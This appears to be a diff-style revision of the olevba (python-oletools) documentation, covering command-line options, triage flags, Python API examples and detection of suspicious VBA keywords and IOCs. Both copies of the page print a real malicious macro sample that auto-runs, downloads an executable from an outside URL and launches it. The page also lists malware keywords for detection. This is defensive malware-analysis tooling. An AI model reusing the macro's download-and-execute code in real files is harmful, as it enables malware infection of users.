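The modification and creation times in the table above are stored in each OLE directory entry as 64-bit FILETIME values, that is, counts of 100-nanosecond intervals since 1601-01-01 UTC. The following is a minimal sketch of that conversion, not oletimes' own code: the helper name `filetime_to_datetime` is an assumption made for illustration, and a raw value of 0 is treated as "not set", which corresponds to the `None` cells shown above.

```python
from datetime import datetime, timedelta

# FILETIME epoch: 1601-01-01 00:00:00 UTC
FILETIME_EPOCH = datetime(1601, 1, 1)


def filetime_to_datetime(filetime):
    """Convert a 64-bit FILETIME integer to a naive UTC datetime.

    Hypothetical helper for illustration; returns None when the
    timestamp is 0, i.e. not set in the directory entry.
    """
    if filetime == 0:
        return None
    # FILETIME counts 100-nanosecond ticks: 10 ticks = 1 microsecond
    return FILETIME_EPOCH + timedelta(microseconds=filetime // 10)


# An unset timestamp
print(filetime_to_datetime(0))
# The Unix epoch expressed as a FILETIME value
print(filetime_to_datetime(116444736000000000))
```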
+TODO
+python-oletools documentation
+Contribute, Suggest Improvements or Report Issues
Tools:
+olevba is a script to parse OLE and OpenXML files such as MS Office documents (e.g. Word, Excel), to detect VBA Macros, extract their source code in clear text, and detect security-related patterns such as auto-executable macros, suspicious VBA keywords used by malware, and potential IOCs (IP addresses, URLs, executable filenames, etc). It also detects and decodes several common obfuscation methods including Hex encoding, StrReverse, Base64, Dridex, and extracts IOCs from decoded strings.
-It can be used either as a command-line tool, or as a python module from your own applications.
-It is part of the python-oletools package.
-olevba is based on source code from officeparser by John William Davison, with significant modifications.
-MS Office files encrypted with a password are also supported, because VBA macro code is never encrypted, only the content of the document.
-See this article for more information and technical details about VBA Macros and how they are stored in MS Office documents.
-Usage: olevba.py [options] <filename> [filename2 ...]
-
-Options:
- -h, --help show this help message and exit
- -r find files recursively in subdirectories.
- -z ZIP_PASSWORD, --zip=ZIP_PASSWORD
- if the file is a zip archive, open first file from it,
- using the provided password (requires Python 2.6+)
- -f ZIP_FNAME, --zipfname=ZIP_FNAME
- if the file is a zip archive, file(s) to be opened
- within the zip. Wildcards * and ? are supported.
- (default:*)
- -t triage mode, display results as a summary table
- (default for multiple files)
- -d detailed mode, display full results (default for
- single file)
- -i INPUT, --input=INPUT
- input file containing VBA source code to be analyzed
- (no parsing)
- --decode display all the obfuscated strings with their decoded
- content (Hex, Base64, StrReverse, Dridex).
-Scan a single file:
-olevba.py file.doc
-Scan a single file, stored in a Zip archive with password "infected":
-olevba.py malicious_file.xls.zip -z infected
-Scan a single file, showing all obfuscated strings decoded:
-olevba.py file.doc --decode
-Scan VBA source code extracted into a text file:
-olevba.py -i source_code.vba
-Scan a collection of files stored in a folder:
-olevba.py MalwareZoo/VBA/*
-Scan all .doc and .xls files, recursively in all subfolders:
-olevba.py MalwareZoo/VBA/*.doc MalwareZoo/VBA/*.xls -r
-Scan all .doc files within all .zip files with password, recursively:
-olevba.py MalwareZoo/VBA/*.zip -r -z infected -f *.doc
-When a single file is scanned, or when using the option -d, all details of the analysis are displayed.
-For example, checking the malware sample DIAN_caso-5415.doc:
->olevba.py c:\MalwareZoo\VBA\DIAN_caso-5415.doc.zip -z infected
-===============================================================================
-FILE: DIAN_caso-5415.doc.malware in c:\MalwareZoo\VBA\DIAN_caso-5415.doc.zip
-Type: OLE
--------------------------------------------------------------------------------
-VBA MACRO ThisDocument.cls
-in file: DIAN_caso-5415.doc.malware - OLE stream: Macros/VBA/ThisDocument
-- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-Option Explicit
-Private Declare Function URLDownloadToFileA Lib "urlmon" (ByVal FVQGKS As Long,_
-ByVal WSGSGY As String, ByVal IFRRFV As String, ByVal NCVOLV As Long, _
-ByVal HQTLDG As Long) As Long
-Sub AutoOpen()
- Auto_Open
-End Sub
-Sub Auto_Open()
-SNVJYQ
-End Sub
-Public Sub SNVJYQ()
- OGEXYR "http://germanya.com.ec/logs/test.exe", Environ("TMP") & "\sfjozjero.
-exe"
-End Sub
-Function OGEXYR(XSTAHU As String, PHHWIV As String) As Boolean
- Dim HRKUYU, lala As Long
- HRKUYU = URLDownloadToFileA(0, XSTAHU, PHHWIV, 0, 0)
- If HRKUYU = 0 Then OGEXYR = True
- Dim YKPZZS
- YKPZZS = Shell(PHHWIV, 1)
- MsgBox "El contenido de este documento no es compatible con este equipo." &
-vbCrLf & vbCrLf & "Por favor intente desde otro equipo.", vbCritical, "Equipo no
- compatible"
- lala = URLDownloadToFileA(0, "http://germanya.com.ec/logs/counter.php", Envi
-ron("TMP") & "\lkjljlljk", 0, 0)
- Application.DisplayAlerts = False
- Application.Quit
-End Function
-Sub Workbook_Open()
- Auto_Open
-End Sub
-
-- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
-ANALYSIS:
-+------------+----------------------+-----------------------------------------+
-| Type | Keyword | Description |
-+------------+----------------------+-----------------------------------------+
-| AutoExec | AutoOpen | Runs when the Word document is opened |
-| AutoExec | Auto_Open | Runs when the Excel Workbook is opened |
-| AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
-| Suspicious | Lib | May run code from a DLL |
-| Suspicious | Shell | May run an executable file or a system |
-| | | command |
-| Suspicious | Environ | May read system environment variables |
-| Suspicious | URLDownloadToFileA | May download files from the Internet |
-| IOC | http://germanya.com. | URL |
-| | ec/logs/test.exe" | |
-| IOC | http://germanya.com. | URL |
-| | ec/logs/counter.php" | |
-| IOC | germanya.com | Executable file name |
-| IOC | test.exe | Executable file name |
-| IOC | sfjozjero.exe | Executable file name |
-+------------+----------------------+-----------------------------------------+
-When several files are scanned, or when using the option -t, a summary of the analysis for each file is displayed. This is more convenient for quick triage of a collection of suspicious files.
-The following flags show the results of the analysis:
-Here is an example:
-c:\>olevba.py \MalwareZoo\VBA\samples\*
-Flags Filename
------------ -----------------------------------------------------------------
-OLE:MASI--- \MalwareZoo\VBA\samples\DIAN_caso-5415.doc.malware
-OLE:MASIH-- \MalwareZoo\VBA\samples\DRIDEX_1.doc.malware
-OLE:MASIH-- \MalwareZoo\VBA\samples\DRIDEX_2.doc.malware
-OLE:MASI--- \MalwareZoo\VBA\samples\DRIDEX_3.doc.malware
-OLE:MASIH-- \MalwareZoo\VBA\samples\DRIDEX_4.doc.malware
-OLE:MASIH-- \MalwareZoo\VBA\samples\DRIDEX_5.doc.malware
-OLE:MASIH-- \MalwareZoo\VBA\samples\DRIDEX_6.doc.malware
-OLE:MAS---- \MalwareZoo\VBA\samples\DRIDEX_7.doc.malware
-OLE:MASIH-- \MalwareZoo\VBA\samples\DRIDEX_8.doc.malware
-OLE:MASIHBD \MalwareZoo\VBA\samples\DRIDEX_9.xls.malware
-OLE:MASIH-- \MalwareZoo\VBA\samples\DRIDEX_A.doc.malware
-OLE:------- \MalwareZoo\VBA\samples\Normal_Document.doc
-OLE:M------ \MalwareZoo\VBA\samples\Normal_Document_Macro.doc
-OpX:MASI--- \MalwareZoo\VBA\samples\RottenKitten.xlsb.malware
-OLE:MASI-B- \MalwareZoo\VBA\samples\ROVNIX.doc.malware
-OLE:MA----- \MalwareZoo\VBA\samples\Word within Word macro auto.doc
-olevba may be used to open a MS Office file, detect if it contains VBA macros, extract and analyze the VBA source code from your own python applications.
-IMPORTANT: olevba is currently under active development, therefore this API is likely to change.
-First, import the oletools.olevba package, using at least the VBA_Parser and VBA_Scanner classes:
-from oletools.olevba import VBA_Parser, VBA_Scanner
-To parse a file on disk, create an instance of the VBA_Parser class, providing the name of the file to open as parameter. For example:
-vba = VBA_Parser('my_file_with_macros.doc')
-The file may also be provided as a bytes string containing its data. In that case, the actual filename must be provided for reference, and the file content with the data parameter. For example:
-myfile = 'my_file_with_macros.doc'
-filedata = open(myfile, 'rb').read()
-vba = VBA_Parser(myfile, data=filedata)
-VBA_Parser will raise an exception if the file is not a supported format, either OLE (MS Office 97-2003) or OpenXML (MS Office 2007+).
-The method detect_vba_macros of a VBA_Parser object returns True if VBA macros have been found in the file, False otherwise.
-if vba.detect_vba_macros():
- print 'VBA Macros found'
-else:
- print 'No VBA Macros found'
-Note: The detection algorithm looks for streams and storage with specific names in the OLE structure, which works fine for all the supported formats listed above. However, for some formats such as PowerPoint 97-2003, this method will always return False because VBA Macros are stored in a different way which is not yet supported by olevba.
-Moreover, if the file contains an embedded document (e.g. an Excel workbook inserted into a Word document), this method may return True if the embedded document contains VBA Macros, even if the main document does not.
-The method extract_macros extracts and decompresses source code for each VBA macro found in the file (possibly including embedded files). It is a generator yielding a tuple (filename, stream_path, vba_filename, vba_code) for each VBA macro found.
-Example:
-for (filename, stream_path, vba_filename, vba_code) in vba.extract_macros():
- print '-'*79
- print 'Filename :', filename
- print 'OLE stream :', stream_path
- print 'VBA filename:', vba_filename
- print '- '*39
- print vba_code
-Note: this API is under active development and may change in the future.
-The class VBA_Scanner can be used to scan the source code of a VBA module to find obfuscated strings, suspicious keywords, IOCs, auto-executable macros, etc.
-First, create a VBA_Scanner object with a string containing the VBA source code (for example returned by the extract_macros method). Then call the methods scan or scan_summary to get the results of the analysis.
-scan() takes an optional argument include_decoded_strings: if set to True, the results will contain all the encoded strings found in the code (Hex, Base64, Dridex) with their decoded value.
-scan returns a list of tuples (type, keyword, description), one for each item in the results.
-Example:
-vba_scanner = VBA_Scanner(vba_code)
-results = vba_scanner.scan(include_decoded_strings=True)
-for kw_type, keyword, description in results:
- print 'type=%s - keyword=%s - description=%s' % (kw_type, keyword, description)
-The function scan_vba is a shortcut for VBA_Scanner(vba_code).scan():
-results = scan_vba(vba_code, include_decoded_strings=True)
-for kw_type, keyword, description in results:
- print 'type=%s - keyword=%s - description=%s' % (kw_type, keyword, description)
-scan_summary returns a tuple with the number of items found for each category: (autoexec, suspicious, IOCs, hex, base64, dridex).
-Deprecated: It is preferable to use either scan_vba or VBA_Scanner to get all results at once.
-The function detect_autoexec checks if VBA macro code contains specific macro names that will be triggered when the document/workbook is opened, closed, changed, etc.
-It returns a list of tuples containing two strings, the detected keyword, and the description of the trigger. (See the malware example above)
-Sample usage:
-from oletools.olevba import detect_autoexec
-autoexec_keywords = detect_autoexec(vba_code)
-if autoexec_keywords:
- print 'Auto-executable macro keywords found:'
- for keyword, description in autoexec_keywords:
- print '%s: %s' % (keyword, description)
-else:
- print 'Auto-executable macro keywords: None found'
-Deprecated: It is preferable to use either scan_vba or VBA_Scanner to get all results at once.
-The function detect_suspicious checks if VBA macro code contains specific keywords often used by malware to act on the system (create files, run commands or applications, write to the registry, etc).
-It returns a list of tuples containing two strings, the detected keyword, and the description of the corresponding malicious behaviour. (See the malware example above)
-Sample usage:
-from oletools.olevba import detect_suspicious
-suspicious_keywords = detect_suspicious(vba_code)
-if suspicious_keywords:
- print 'Suspicious VBA keywords found:'
- for keyword, description in suspicious_keywords:
- print '%s: %s' % (keyword, description)
-else:
- print 'Suspicious VBA keywords: None found'
-Deprecated: It is preferable to use either scan_vba or VBA_Scanner to get all results at once.
-The function detect_patterns checks if VBA macro code contains specific patterns of interest, that may be useful for malware analysis and detection (potential Indicators of Compromise): IP addresses, e-mail addresses, URLs, executable file names.
-It returns a list of tuples containing two strings, the pattern type, and the extracted value. (See the malware example above)
-Sample usage:
-from oletools.olevba import detect_patterns
-patterns = detect_patterns(vba_code)
-if patterns:
- print 'Patterns found:'
- for pattern_type, value in patterns:
- print '%s: %s' % (pattern_type, value)
-else:
- print 'Patterns: None found'
-After usage, it is better to call the close method of the VBA_Parser object, to make sure the file is closed, especially if your application is parsing many files.
-vba.close()
-olevba
+======
+olevba is a script to parse OLE and OpenXML files such as MS Office documents
+(e.g. Word, Excel), to detect VBA Macros, extract their source code in clear text,
+and detect security-related patterns such as auto-executable macros, **suspicious
+VBA keywords** used by malware, anti-sandboxing and anti-virtualization techniques,
+and potential IOCs (IP addresses, URLs, executable filenames, etc).
+It also detects and decodes several common **obfuscation methods including Hex encoding,
+StrReverse, Base64, Dridex**, and extracts IOCs from decoded strings.
+It can be used either as a command-line tool, or as a python module from your own applications.
+It is part of the python-oletools package.
+olevba is based on source code from officeparser
+by John William Davison, with significant modifications.
+Word 97-2003 (.doc, .dot)
Word 2007+ (.docm, .dotm)
Word 2003 XML (.xml)
Excel 97-2003 (.xls)
Excel 2007+ (.xlsm, .xlsb)
PowerPoint 2007+ (.pptm, .ppsm)
Detect VBA macros in MS Office 97-2003 and 2007+ files
Extract VBA macro source code
Detect auto-executable macros
Detect suspicious VBA keywords often used by malware
Detect anti-sandboxing and anti-virtualization techniques
Detect and decode strings obfuscated with Hex/Base64/StrReverse/Dridex
Extract IOCs/patterns of interest such as IP addresses, URLs, e-mail addresses and executable file names
Scan multiple files and sample collections (wildcards, recursive)
Triage mode for a summary view of multiple files
Scan malware samples in password-protected Zip archives
Python API to use olevba from your applications
MS Office files encrypted with a password are also supported, because VBA macro code is never
+encrypted, only the content of the document.
+See this article for more information and technical details about VBA Macros
+and how they are stored in MS Office documents.
+olevba checks the file type: If it is an OLE file (i.e. MS Office 97-2003), it is parsed right away.
If it is a zip file (i.e. MS Office 2007+), olevba looks for all OLE files stored in it (e.g. vbaProject.bin), and opens them.
olevba identifies all the VBA projects stored in the OLE structure.
Each VBA project is parsed to find the corresponding OLE streams containing macro code.
In each of these OLE streams, the VBA macro source code is extracted and decompressed (RLE compression).
olevba looks for specific strings obfuscated with various algorithms (Hex, Base64, StrReverse, Dridex).
olevba scans the macro source code and the deobfuscated strings to find suspicious keywords, auto-executable macros
and potential IOCs (URLs, IP addresses, e-mail addresses, executable filenames, etc).
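The deobfuscation step described above can be pictured with a short sketch. This is not olevba's implementation: the three helper names are hypothetical, only the Hex, Base64 and StrReverse encodings are covered, and the Dridex algorithm is left out because it is not described in this document.

```python
import base64
import binascii


def decode_hex(text):
    """Decode a hex-encoded string such as '687474703a2f2f'."""
    return binascii.unhexlify(text).decode('latin-1')


def decode_base64(text):
    """Decode a Base64-encoded string."""
    return base64.b64decode(text).decode('latin-1')


def decode_strreverse(text):
    """Undo VBA's StrReverse(), which simply reverses the characters."""
    return text[::-1]


# Each call recovers a string that a scanner could then search for
# suspicious keywords or IOCs.
print(decode_hex('687474703a2f2f'))
print(decode_base64('Y21kLmV4ZQ=='))
print(decode_strreverse('exe.dmc'))
```

Once a candidate string is decoded, it can be scanned in the same way as the macro source code itself.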
+Usage: olevba.py [options] <filename> [filename2 ...]
+
+Options:
+  -h, --help            show this help message and exit
+  -r                    find files recursively in subdirectories.
+  -z ZIP_PASSWORD, --zip=ZIP_PASSWORD
+                        if the file is a zip archive, open first file from it,
+                        using the provided password (requires Python 2.6+)
+  -f ZIP_FNAME, --zipfname=ZIP_FNAME
+                        if the file is a zip archive, file(s) to be opened
+                        within the zip. Wildcards * and ? are supported.
+                        (default:*)
+  -t                    triage mode, display results as a summary table
+                        (default for multiple files)
+  -d                    detailed mode, display full results (default for
+                        single file)
+  -i INPUT, --input=INPUT
+                        input file containing VBA source code to be analyzed
+                        (no parsing)
+  --decode              display all the obfuscated strings with their decoded
+                        content (Hex, Base64, StrReverse, Dridex).
+Scan a single file:
+olevba.py file.doc
+Scan a single file, stored in a Zip archive with password "infected":
+olevba.py malicious_file.xls.zip -z infected
+Scan a single file, showing all obfuscated strings decoded:
+olevba.py file.doc --decode
+Scan VBA source code extracted into a text file:
+olevba.py -i source_code.vba
+Scan a collection of files stored in a folder:
+olevba.py MalwareZoo/VBA/*
+Scan all .doc and .xls files, recursively in all subfolders:
+olevba.py MalwareZoo/VBA/*.doc MalwareZoo/VBA/*.xls -r
+Scan all .doc files within all .zip files with password, recursively:
+olevba.py MalwareZoo/VBA/*.zip -r -z infected -f *.doc
+When a single file is scanned, or when using the option -d, all details of the analysis are displayed.
+For example, checking the malware sample DIAN_caso-5415.doc:
+>olevba.py c:\MalwareZoo\VBA\DIAN_caso-5415.doc.zip -z infected
+===============================================================================
+FILE: DIAN_caso-5415.doc.malware in c:\MalwareZoo\VBA\DIAN_caso-5415.doc.zip
+Type: OLE
+-------------------------------------------------------------------------------
+VBA MACRO ThisDocument.cls
+in file: DIAN_caso-5415.doc.malware - OLE stream: Macros/VBA/ThisDocument
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+Option Explicit
+Private Declare Function URLDownloadToFileA Lib "urlmon" (ByVal FVQGKS As Long,_
+ByVal WSGSGY As String, ByVal IFRRFV As String, ByVal NCVOLV As Long, _
+ByVal HQTLDG As Long) As Long
+Sub AutoOpen()
+    Auto_Open
+End Sub
+Sub Auto_Open()
+SNVJYQ
+End Sub
+Public Sub SNVJYQ()
+    OGEXYR "http://germanya.com.ec/logs/test.exe", Environ("TMP") & "\sfjozjero.
+exe"
+End Sub
+Function OGEXYR(XSTAHU As String, PHHWIV As String) As Boolean
+    Dim HRKUYU, lala As Long
+    HRKUYU = URLDownloadToFileA(0, XSTAHU, PHHWIV, 0, 0)
+    If HRKUYU = 0 Then OGEXYR = True
+    Dim YKPZZS
+    YKPZZS = Shell(PHHWIV, 1)
+    MsgBox "El contenido de este documento no es compatible con este equipo." &
+vbCrLf & vbCrLf & "Por favor intente desde otro equipo.", vbCritical, "Equipo no
+ compatible"
+    lala = URLDownloadToFileA(0, "http://germanya.com.ec/logs/counter.php", Envi
+ron("TMP") & "\lkjljlljk", 0, 0)
+    Application.DisplayAlerts = False
+    Application.Quit
+End Function
+Sub Workbook_Open()
+    Auto_Open
+End Sub
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+ANALYSIS:
++------------+----------------------+-----------------------------------------+
+| Type       | Keyword              | Description                             |
++------------+----------------------+-----------------------------------------+
+| AutoExec   | AutoOpen             | Runs when the Word document is opened   |
+| AutoExec   | Auto_Open            | Runs when the Excel Workbook is opened  |
+| AutoExec   | Workbook_Open        | Runs when the Excel Workbook is opened  |
+| Suspicious | Lib                  | May run code from a DLL                 |
+| Suspicious | Shell                | May run an executable file or a system  |
+|            |                      | command                                 |
+| Suspicious | Environ              | May read system environment variables   |
+| Suspicious | URLDownloadToFileA   | May download files from the Internet    |
+| IOC        | http://germanya.com. | URL                                     |
+|            | ec/logs/test.exe"    |                                         |
+| IOC        | http://germanya.com. | URL                                     |
+|            | ec/logs/counter.php" |                                         |
+| IOC        | germanya.com         | Executable file name                    |
+| IOC        | test.exe             | Executable file name                    |
+| IOC        | sfjozjero.exe        | Executable file name                    |
++------------+----------------------+-----------------------------------------+
+When several files are scanned, or when using the option -t, a summary of the analysis for each file is displayed.
+This is more convenient for quick triage of a collection of suspicious files.
+The following flags show the results of the analysis:
+OLE: the file type is OLE, for example MS Office 97-2003
OpX: the file type is OpenXML, for example MS Office 2007+
?: the file type is not supported
M: contains VBA Macros
A: auto-executable macros
S: suspicious VBA keywords
I: potential IOCs
H: hex-encoded strings (potential obfuscation)
B: Base64-encoded strings (potential obfuscation)
D: Dridex-encoded strings (potential obfuscation)
Here is an example:
+c:\>olevba.py \MalwareZoo\VBA\samples\*
+Flags       Filename
+----------- -----------------------------------------------------------------
+OLE:MASI--- \MalwareZoo\VBA\samples\DIAN_caso-5415.doc.malware
+OLE:MASIH-- \MalwareZoo\VBA\samples\DRIDEX_1.doc.malware
+OLE:MASIH-- \MalwareZoo\VBA\samples\DRIDEX_2.doc.malware
+OLE:MASI--- \MalwareZoo\VBA\samples\DRIDEX_3.doc.malware
+OLE:MASIH-- \MalwareZoo\VBA\samples\DRIDEX_4.doc.malware
+OLE:MASIH-- \MalwareZoo\VBA\samples\DRIDEX_5.doc.malware
+OLE:MASIH-- \MalwareZoo\VBA\samples\DRIDEX_6.doc.malware
+OLE:MAS---- \MalwareZoo\VBA\samples\DRIDEX_7.doc.malware
+OLE:MASIH-- \MalwareZoo\VBA\samples\DRIDEX_8.doc.malware
+OLE:MASIHBD \MalwareZoo\VBA\samples\DRIDEX_9.xls.malware
+OLE:MASIH-- \MalwareZoo\VBA\samples\DRIDEX_A.doc.malware
+OLE:------- \MalwareZoo\VBA\samples\Normal_Document.doc
+OLE:M------ \MalwareZoo\VBA\samples\Normal_Document_Macro.doc
+OpX:MASI--- \MalwareZoo\VBA\samples\RottenKitten.xlsb.malware
+OLE:MASI-B- \MalwareZoo\VBA\samples\ROVNIX.doc.malware
+OLE:MA----- \MalwareZoo\VBA\samples\Word within Word macro auto.doc
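When triage output is post-processed by another script, the flags column can be split back into individual fields. The sketch below assumes the layout shown in the example above (a file type, a colon, then seven positions in the order M, A, S, I, H, B, D, with `-` for an unset flag); the function and field names are hypothetical and not part of olevba.

```python
# Flag letters in the order they appear after the colon,
# paired with an illustrative field name for each.
FLAG_FIELDS = (
    ('M', 'macros'),
    ('A', 'autoexec'),
    ('S', 'suspicious'),
    ('I', 'iocs'),
    ('H', 'hex'),
    ('B', 'base64'),
    ('D', 'dridex'),
)


def parse_triage_flags(flags):
    """Split a flags string such as 'OLE:MASIH--' into a dict."""
    file_type, _, letters = flags.partition(':')
    parsed = {'file_type': file_type}
    for index, (letter, name) in enumerate(FLAG_FIELDS):
        # A position holds its letter when the flag is set, '-' otherwise
        parsed[name] = letters[index:index + 1] == letter
    return parsed


flags = parse_triage_flags('OLE:MASI-B-')
print(flags['file_type'])
print(flags['base64'])
```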
+olevba may be used from your own python applications to open an MS Office file, detect whether it contains VBA macros,
+and extract and analyze the VBA source code.
+IMPORTANT: olevba is currently under active development, therefore this API is likely to change.
+First, import the oletools.olevba package, using at least the VBA_Parser and VBA_Scanner classes:
+from oletools.olevba import VBA_Parser, VBA_Scanner
+To parse a file on disk, create an instance of the VBA_Parser class, providing the name of the file to open as parameter.
+For example:
+vba = VBA_Parser('my_file_with_macros.doc')
+The file may also be provided as a bytes string containing its data. In that case, pass the actual
+filename for reference as the first argument, and the file content through the data parameter. For example:
+myfile = 'my_file_with_macros.doc'
+# read the whole file into memory; the with block closes the file handle
+with open(myfile, 'rb') as f:
+    filedata = f.read()
+vba = VBA_Parser(myfile, data=filedata)
+VBA_Parser will raise an exception if the file is not a supported format, either OLE (MS Office 97-2003) or OpenXML
+(MS Office 2007+).
+The method detect_vba_macros of a VBA_Parser object returns True if VBA macros have been found in the file,
+False otherwise.
+if vba.detect_vba_macros():
+    print 'VBA Macros found'
+else:
+    print 'No VBA Macros found'
+Note: The detection algorithm looks for streams and storages with specific names in the OLE structure, which works fine
+for all the supported formats listed above. However, for some formats such as PowerPoint 97-2003, this method will
+always return False because VBA Macros are stored in a different way which is not yet supported by olevba.
+Moreover, if the file contains an embedded document (e.g. an Excel workbook inserted into a Word document), this method
+may return True if the embedded document contains VBA Macros, even if the main document does not.
+The method extract_macros extracts and decompresses source code for each VBA macro found in the file (possibly
+including embedded files). It is a generator yielding a tuple (filename, stream_path, vba_filename, vba_code)
+for each VBA macro found.
+filename: If the file is OLE (MS Office 97-2003), filename is the path of the file.
+If the file is OpenXML (MS Office 2007+), filename is the path of the OLE subfile containing VBA macros within the zip archive,
+e.g. word/vbaProject.bin.
stream_path: path of the OLE stream containing the VBA macro source code
vba_filename: corresponding VBA filename
vba_code: string containing the VBA source code in clear text
Example:
+for (filename, stream_path, vba_filename, vba_code) in vba.extract_macros():
+    print '-'*79
+    print 'Filename    :', filename
+    print 'OLE stream  :', stream_path
+    print 'VBA filename:', vba_filename
+    print '- '*39
+    print vba_code
+Note: this API is under active development and may change in the future.
+The class VBA_Scanner can be used to scan the source code of a VBA module to find obfuscated strings,
+suspicious keywords, IOCs, auto-executable macros, etc.
+First, create a VBA_Scanner object with a string containing the VBA source code (for example returned by the
+extract_macros method). Then call the methods scan or scan_summary to get the results of the analysis.
+scan() takes an optional argument include_decoded_strings: if set to True, the results will contain all the encoded
+strings found in the code (Hex, Base64, Dridex) with their decoded value.
+scan returns a list of tuples (type, keyword, description), one for each item in the results.
+type may be either 'AutoExec', 'Suspicious', 'IOC', 'Hex String', 'Base64 String' or 'Dridex String'.
keyword is the string found for auto-executable macros, suspicious keywords or IOCs. For obfuscated strings, it is
the decoded value of the string.
+Example:
+vba_scanner = VBA_Scanner(vba_code)
+results = vba_scanner.scan(include_decoded_strings=True)
+for kw_type, keyword, description in results:
+    print 'type=%s - keyword=%s - description=%s' % (kw_type, keyword, description)
+The function scan_vba is a shortcut for VBA_Scanner(vba_code).scan():
+results = scan_vba(vba_code, include_decoded_strings=True)
+for kw_type, keyword, description in results:
+    print 'type=%s - keyword=%s - description=%s' % (kw_type, keyword, description)
+scan_summary returns a tuple with the number of items found for each category:
+(autoexec, suspicious, IOCs, hex, base64, dridex).
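To make the shape of that tuple concrete, here is a sketch of how equivalent counts could be derived from a list of `(type, keyword, description)` results like the one `scan` returns. It is an illustration only, not olevba's code: the `summarize` helper is hypothetical, and the sample data is copied from the analysis table of the malware example above.

```python
from collections import Counter

# Result types listed in the order of the summary tuple:
# (autoexec, suspicious, IOCs, hex, base64, dridex)
CATEGORIES = ('AutoExec', 'Suspicious', 'IOC',
              'Hex String', 'Base64 String', 'Dridex String')


def summarize(results):
    """Count scan results per category (hypothetical helper)."""
    counts = Counter(kw_type for kw_type, _keyword, _description in results)
    return tuple(counts[category] for category in CATEGORIES)


# A few rows taken from the sample analysis table
sample_results = [
    ('AutoExec', 'AutoOpen', 'Runs when the Word document is opened'),
    ('AutoExec', 'Workbook_Open', 'Runs when the Excel Workbook is opened'),
    ('Suspicious', 'Shell', 'May run an executable file or a system command'),
    ('IOC', 'test.exe', 'Executable file name'),
]
print(summarize(sample_results))
```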
+Deprecated: It is preferable to use either scan_vba or VBA_Scanner to get all results at once.
+The function detect_autoexec checks if VBA macro code contains specific macro names
+that will be triggered when the document/workbook is opened, closed, changed, etc.
+It returns a list of tuples containing two strings, the detected keyword, and the
+description of the trigger. (See the malware example above)
+Sample usage:
+from oletools.olevba import detect_autoexec
+autoexec_keywords = detect_autoexec(vba_code)
+if autoexec_keywords:
+    print 'Auto-executable macro keywords found:'
+    for keyword, description in autoexec_keywords:
+        print '%s: %s' % (keyword, description)
+else:
+    print 'Auto-executable macro keywords: None found'
+Deprecated: It is preferable to use either scan_vba or VBA_Scanner to get all results at once.
+The function detect_suspicious checks if VBA macro code contains specific
+keywords often used by malware to act on the system (create files, run
+commands or applications, write to the registry, etc).
+It returns a list of tuples containing two strings, the detected keyword, and the
+description of the corresponding malicious behaviour. (See the malware example above)
+Sample usage:
+from oletools.olevba import detect_suspicious
+suspicious_keywords = detect_suspicious(vba_code)
+if suspicious_keywords:
+    print 'Suspicious VBA keywords found:'
+    for keyword, description in suspicious_keywords:
+        print '%s: %s' % (keyword, description)
+else:
+    print 'Suspicious VBA keywords: None found'
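As a rough picture of what a keyword check of this kind involves, the following sketch searches VBA code for whole-word, case-insensitive matches against a small table. It is not olevba's implementation: the `find_suspicious` helper is hypothetical, and the table holds only the four keywords and descriptions that appear in the sample analysis above, not the full list olevba uses.

```python
import re

# Keywords and descriptions copied from the sample analysis table;
# the real tool checks many more.
SUSPICIOUS_KEYWORDS = (
    ('Lib', 'May run code from a DLL'),
    ('Shell', 'May run an executable file or a system command'),
    ('Environ', 'May read system environment variables'),
    ('URLDownloadToFileA', 'May download files from the Internet'),
)


def find_suspicious(vba_code):
    """Return (keyword, description) pairs found in vba_code."""
    found = []
    for keyword, description in SUSPICIOUS_KEYWORDS:
        # \b keeps 'Lib' from matching inside longer identifiers
        pattern = r'\b' + re.escape(keyword) + r'\b'
        if re.search(pattern, vba_code, re.IGNORECASE):
            found.append((keyword, description))
    return found


for keyword, description in find_suspicious('YKPZZS = Shell(PHHWIV, 1)'):
    print('%s: %s' % (keyword, description))
```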
+Deprecated: It is preferable to use either scan_vba or VBA_Scanner to get all results at once.
+The function detect_patterns checks if VBA macro code contains specific
+patterns of interest, that may be useful for malware analysis and detection
+(potential Indicators of Compromise): IP addresses, e-mail addresses,
+URLs, executable file names.
+It returns a list of tuples containing two strings, the pattern type, and the
+extracted value. (See the malware example above)
+Sample usage:
+from oletools.olevba import detect_patterns
+patterns = detect_patterns(vba_code)
+if patterns:
+    print 'Patterns found:'
+    for pattern_type, value in patterns:
+        print '%s: %s' % (pattern_type, value)
+else:
+    print 'Patterns: None found'
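Pattern extraction of this kind is typically done with regular expressions. The sketch below shows the general idea under stated assumptions: the three expressions and the `find_patterns` helper are simplified illustrations written for this example, not the patterns olevba actually uses, and they will miss or over-match cases a production scanner must handle.

```python
import re

# Simplified, illustrative patterns (assumptions, not olevba's own)
URL_RE = re.compile(r'\b(?:https?|ftp)://[^\s"\'<>]+', re.IGNORECASE)
IPV4_RE = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')
EXE_RE = re.compile(r'\b[\w.-]+\.(?:exe|dll|scr|bat|cmd|vbs)\b', re.IGNORECASE)

PATTERNS = (
    ('URL', URL_RE),
    ('IPv4 address', IPV4_RE),
    ('Executable file name', EXE_RE),
)


def find_patterns(vba_code):
    """Return (pattern_type, value) tuples for each match in vba_code."""
    found = []
    for pattern_type, regex in PATTERNS:
        for match in regex.finditer(vba_code):
            found.append((pattern_type, match.group()))
    return found


# One line from the malware sample shown earlier
sample = 'OGEXYR "http://germanya.com.ec/logs/test.exe", Environ("TMP") & "\\sfjozjero.exe"'
for pattern_type, value in find_patterns(sample):
    print('%s: %s' % (pattern_type, value))
```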
+After use, call the close method of the VBA_Parser object to make sure the file is closed,
+especially if your application is parsing many files.
+vba.close()
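One way to guarantee that `close` is called even when an exception interrupts parsing is the standard library's `contextlib.closing`, which works with any object that has a `close` method. The sketch below uses a hypothetical stand-in class, `FakeParser`, so that it runs without oletools installed; with the real library, a `VBA_Parser` instance would presumably take its place.

```python
from contextlib import closing


class FakeParser(object):
    """Hypothetical stand-in for VBA_Parser; only close() matters here."""

    def __init__(self, filename):
        self.filename = filename
        self.closed = False

    def detect_vba_macros(self):
        return False

    def close(self):
        self.closed = True


parser = FakeParser('my_file_with_macros.doc')
# closing() calls parser.close() when the block exits,
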